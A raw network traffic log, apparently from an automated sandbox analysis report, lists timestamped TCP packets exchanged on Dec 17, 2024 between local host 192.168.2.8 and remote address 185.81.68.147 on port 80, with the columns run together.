                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.992166996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.992317915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.992399931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.993119955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.993218899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.993304014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.994092941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.994214058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.994298935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.995052099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.995156050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.995254040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.996002913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.996099949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.996195078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.996959925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.997149944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.997240067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.997911930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.998027086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.998128891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.998836994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.998960972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.999043941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.999908924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.000009060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.000098944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.000752926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.000870943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.001113892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.001719952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.001802921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.001904011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.002712011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.002892971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.002974033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.003639936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.003741980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.003844023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.004596949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.004791975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.004877090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.005510092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.005625010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.005713940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.006475925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.006578922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.006707907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.007437944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.007520914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.007636070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.008402109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.008506060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.008584023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.009308100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.009496927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.009665966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.010257959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.010340929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.010418892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.011214972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.011390924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.011480093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.012166977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.012295008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.012384892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.013118982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.013230085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.013334990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.014051914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.014152050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.014256954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015059948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015185118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015325069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015980005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.016100883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.016177893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.016931057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.017057896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.017144918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018018007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018095016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018186092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.018842936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019037962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019172907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019802094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019901991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.019987106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.020739079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.020818949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021004915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021686077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021759987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.021872044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.022639036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.022742033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.022831917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.023623943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.023685932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.023776054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.024543047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.024653912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.024764061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.025528908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.025600910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.025717020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.026429892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.026628017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.026710987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.027443886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.027535915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.027667999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.028373003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.028484106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.028578043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.029335022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.029479980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.029571056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.030267954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.030395985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.030477047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.031217098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.031339884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.031430006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.032160044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.032274008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.032461882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.033087969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.082355022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176173925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176225901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176316977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176529884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176678896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.176747084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.177330017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.177450895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.177544117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.178263903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.178333044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.178440094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.179373026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.179544926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.179625988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.180161953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.180267096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.180397034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.181157112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.181225061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.181312084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.182082891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.182189941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.182297945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.183002949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.183073997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.183243036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.184011936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.184081078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.184191942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.184938908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.185062885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.185152054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.185940981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.186013937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.186100006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.186918974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.187031984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.187199116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.187823057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.187886953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.188070059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.188755989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.188838005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.188973904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.189727068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.189785004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.189908981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.190618992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.190731049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.190812111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.191587925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.191695929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.191867113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.192562103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.192687035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.192779064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.193483114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.193605900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.193707943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.194425106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.194565058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.194775105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.195446014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.195523024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.195678949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.196338892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.196451902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.196576118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.197341919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.197437048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.197575092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.198287964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.198410034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.198508024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.199209929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.199330091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.199450970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.200185061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.200319052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.200408936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.201097012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.201208115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.201338053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.202052116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.202188015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.202274084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.203022003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.203115940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.203198910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.203969955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.204103947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.204180956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.204938889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.205054998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.205167055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.205874920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.205997944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.206106901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.206835985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.206964016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.207142115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.207819939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.207904100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.207999945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.208725929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.208848000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.208986044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.209677935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.209773064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.209857941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.210642099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.210745096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.210845947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.211664915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.211848974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.211929083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.212548018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.212703943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.212780952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.213493109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.213614941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.213660955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.214458942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.214581013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.214658976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.215398073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.215533972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.215588093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.216348886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.216475964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.216526031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.217303991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.217423916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.217547894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.218266964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.218380928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.218431950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.219198942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.219419956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.219484091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.220441103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.220541954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.220664978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.221199036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.221270084 CET8049709185.81.68.147192.168.2.8
